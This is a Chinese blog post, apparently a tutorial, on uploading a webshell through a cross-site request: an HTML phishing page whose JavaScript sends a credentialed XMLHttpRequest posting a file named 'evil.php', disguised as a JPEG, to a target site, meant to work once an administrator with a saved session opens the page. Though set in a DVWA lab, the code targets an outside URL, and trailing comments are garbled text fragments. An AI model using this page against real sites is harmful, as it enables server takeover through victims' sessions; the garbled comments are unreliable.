利用JavaScript进行getshell文件上传
看到一些XSS+CSRF上传的漏洞,这次就学习了一下HTML5的一些新特性,用JavaScript实现了文件上传。攻击者可以向管理员发送一个钓鱼页面,管理员只要打开了这个页面,并且当前浏览器保存了后台的会话信息,那么就有可能实现getshell。
1.1 软件环境
Chrome浏览器
DVWA-1.9漏洞测试平台
wamp3.0集成环境
1.2 host文件与虚拟目录配置
修改host文件,添加dvwa.me与hey.me指向本机
设置dvwa.me虚拟主机指向WEB_ROOT/dvwa
设置hey.me虚拟主机指向WEB_ROOT
二、利用详解
Markup
<html><head>
<title>黑白网漏洞测试</title></head><body>
<form id="myForm" method="POST" name="myForm" action="ajax.php">
<button id="submit_btn" type="button">Upload</button>
</form>
<script type="text/javascript">
function btnClick(){
document.getElementById("submit_btn").onclick=function(){
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;
var url = "http://www.heibai.org";
var formdata = new FormData();
var filedata = new Blob(['This is evil txt'], {type: 'image/jpeg'});
formdata.append("Upload","Upload");
formdata.append("uploaded",filedata,"evil.php");
xmlhttp.onreadystatechange=function(){
if (xmlhttp.readyState==4 && xmlhttp.status==200){
console.log(xmlhttp.responseText);
}
}
xmlhttp.open("POST",url,true);
xmlhttp.send(formdata);
}
}
btnClick();
</script></body>
</html>
上一篇:快速关闭电脑程序的方法
相关文章
- 5条评论
- 美咩夏棠2022-05-30 08:03:28
- p; <script type="text/javascript"> function btnClick(){&
- 酒奴信愁2022-05-30 15:20:12
- d="submit_btn" type="button">Upload</button> </form>
- 怎忘夏棠2022-05-30 08:32:46
- mdata); }&
- 澄萌寄晴2022-05-30 08:57:31
- bsp; xmlhttp.open("POST",url,true); &nbs
- 莣萳折奉2022-05-30 13:54:02
- 器保存了后台的会话信息,那么就有可能实现getshell。1.1 软件环境Chrome浏览器DVWA-1.9漏洞测试平台wamp3.0集成环境1.2 host文件与虚拟目录配置修改host